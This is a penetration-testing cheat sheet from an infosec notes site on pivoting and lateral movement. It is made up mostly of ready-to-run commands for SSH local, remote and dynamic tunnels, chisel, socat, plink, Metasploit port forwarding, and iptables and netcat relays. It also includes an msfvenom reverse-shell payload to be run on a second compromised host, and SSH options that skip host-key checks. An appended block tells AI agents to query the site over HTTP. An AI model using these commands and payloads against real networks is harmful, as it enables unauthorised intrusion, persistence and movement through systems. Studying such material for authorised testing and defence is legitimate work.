# Pivoting/Lateral Movement {% hint style="success" %} Hack Responsibly. Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. {% endhint %} {% hint style="danger" %} Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). {% endhint %} ## SSH Tunneling 101 ```bash # SSH local port forward to reach an_internal_server_ip:port via server_ip ssh tunneler@server_ip -p 2222 -L 1234:an_internal_server_ip:80 # Now curl localhost:1234 will fetch an_internal_server_ip:80 which is reachable from server_ip only # dynamic port forward to create a SOCKS proxy to visit any_internal_server_ip ssh tunneler@server_ip -p 2222 -D 1080 # next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from server_ip only # ProxyJump ssh to an_internal_host via ssh server_ip ssh -J tunneler@server_ip:2222 whistler@an_internal_host # which is only accessible from server_ip # SSH remote port forward to send traffic back to our local port from a port of server_ip ssh whistler@server_ip -p 2222 -L 58671:localhost:1234 # # this will listen on port 58671 of server_ip and tunnel the traffic back to us on loclahost:1234; nc -nlvp 1234 to receive for example # Chain ProxyJump + dynamic port forward to create a proxy of 2nd_box which is only accessible via 1st_box ssh -j firstuser@1st_box:2222 seconduser@2nd_box -D 1080 # next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from 2nd_box only # bypass first time prompt when have non-interactive shell ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" ``` ### SSH reverse tunneling ```bash ssh -f -N -R 8000:10.3.3.14:80 -R 4443:10.3.3.14:443 -R 33306:10.3.3.14:3306 -R 33389:10.3.3.14:3389 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i key kali@192.168.19.57 # kill with ps -C ssh kill -9 ``` #### If you already have an SSH session ```bash -R 8081:172.24.0.2:80 # (on my Kali machine listen on 8081, get it from 172.24.0.2:80) # :8081<------------:80 # Now you can access 172.24.0.2:80, which you didn't have direct access to -L 8083:127.0.0.1:8084 # (on your machine listen on 8083, send it to my Kali machine on 8084) # :8084<------------:8083<------------:XXXX # run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it For reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell Run it on 2nd remote target to get a shell on Kali ``` #### If you didn't have an SSH session First, SSH to your Kali from target machine On Kali: ```bash service ssh start # "add a user, give it /bin/false in /etc/passwd" ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1 ``` ## Port Forwarding (Single port to one port) ### Using Socat For linux Forward your 8083 to 10.39.0.2:443 ```bash ./socat TCP4-LISTEN:8083,fork TCP4:10.39.0.2:443 ``` ### Using Chisel Most platforms Remote static tunnels "port to port": ```bash #On Kali "reverse proxy listener": ./chisel server -p 8000 -reverse #General command: ./chisel client $YOUR_IP:$YOUR_CHISEL_SERVER_PORT L/R:[$YOUR_LOCAL_IP]:$TUNNEL_LISTENING_PORT:$TUNNEL_TARGET:$TUNNEL_PORT ``` #### Remote tunnels "access IP:PORT you couldn't access before": ```bash #On Target: ./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80 ``` #### Local tunnels "listen on the target for something, and send it to us": ```bash #On Target: ./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003 ``` ### Using Metasploit Get meterpreter session, then: ```bash portfwd add -l 4445 -p 4443 -r 10.1.1.1 # Use -R to make it reverse ``` ### Using Plink.exe Just like SSH, but Windows only. Part of the Putty toolset. ```bash #On Attacker service ssh start cp /usr/share/windows-binaries/plink.exe #to the target machine ``` ```bash #On Target: plink.exe 10.10.10.123 -P 22 -C -N -L 0.0.0.0:4445:10.10.10.123:4443 -l $KALIUSER -pw $PASS ``` ## Dynamic Port Forwarding (Single port to any remote port) * setup proxychains with socks5 on 127.0.0.1:1080 * Or set up socks5 proxy on firefox > For nmap use `-Pn -sT` or use tcp scanner in msf ```sh ssh -i bobs.key -p 2222 bob@10.10.10.123 -D1080 ``` ### Using Chisel ```bash #On Kali: ./chisel server -p 8000 -reverse #On Target: ./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080 ./chisel server -p 8001 --socks5 #On Kali: ./chisel client 127.0.0.1:8001 socks ``` ### Using Metasploit * Get meterpreter session * Auto route (multi/manage/autoroute) * Start socks proxy (auxiliary/server/socks4a) ## Forward ports using built-in firewall ### Using iptables To set up a port forwarder using iptables run the below commands as root (or with sudo). ```bash echo '1' > /proc/sys/net/ipv4/conf/eth0/forwarding iptables -t nat -A PREROUTING -p tcp -i eth0 --dport $lport -j DNAT --to-destination $ip:$rport iptables -A FORWARD -p tcp -d $ip --dport $rport -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT ``` ## Port Forwarding with netcat Forward traffic using netcat and a named pipe. ```bash mknod $mypipe p nc -l -p $lport < $mypipe | nc $ip $rport > $mypipe ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://zweilosec.gitbook.io/hackers-rest/linux-1/linux-redteam/pivoting-lateral-movement.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.